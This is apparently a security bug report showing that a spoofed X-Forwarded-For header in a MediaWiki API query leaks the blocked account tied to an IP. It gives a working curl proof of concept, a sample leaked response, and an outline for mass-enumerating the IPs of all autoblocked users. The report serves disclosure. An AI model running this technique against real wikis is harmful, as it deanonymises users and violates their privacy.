Steps to reproduce:
- Make an edit with some account (assume your IP at this time is 1.2.3.4)
- Block that account, with autoblock enabled
- Switch to a new IP address
- Try this query:
curl -s -H "X-Forwarded-For: 1.2.3.4" 'https://test.wikipedia.org/w/api.php?action=query&meta=userinfo&format=json&uiprop=blockinfo'
The expected result is for the autoblock to be ignored.
The actual result is that the name of the blocked account appears in the response, associating the user with the IP:
{"batchcomplete":"","query":{"userinfo":{"id":0,"name":"[redacted]","anon":"","blockid":20607,"blockedby":"Suffusion of Yellow","blockedbyid":12061,"blockreason":"Autoblocked because your IP address has been recently used by \"[[User:Suffusion of Yellow alt 6|Suffusion of Yellow alt 6]]\".\nThe reason given for Suffusion of Yellow alt 6's block is \"test\"","blockedtimestamp":"2021-06-18T19:19:49Z","blockexpiry":"2021-06-18T21:19:49Z","blocknocreate":""}}}
But it gets worse. It's possible to put up to about 256 addresses in the X-Forwarded-For header before Apache rejects the header as too large, and all of the addresses are checked for blocks. So with only 2^24 requests, it would be possible to dump the IP of every autoblocked IPv4 user on the wiki. I don't know what the maximum request rate would be before someone noticed the server load and got suspicious, but at 200 requests/second that's only a day.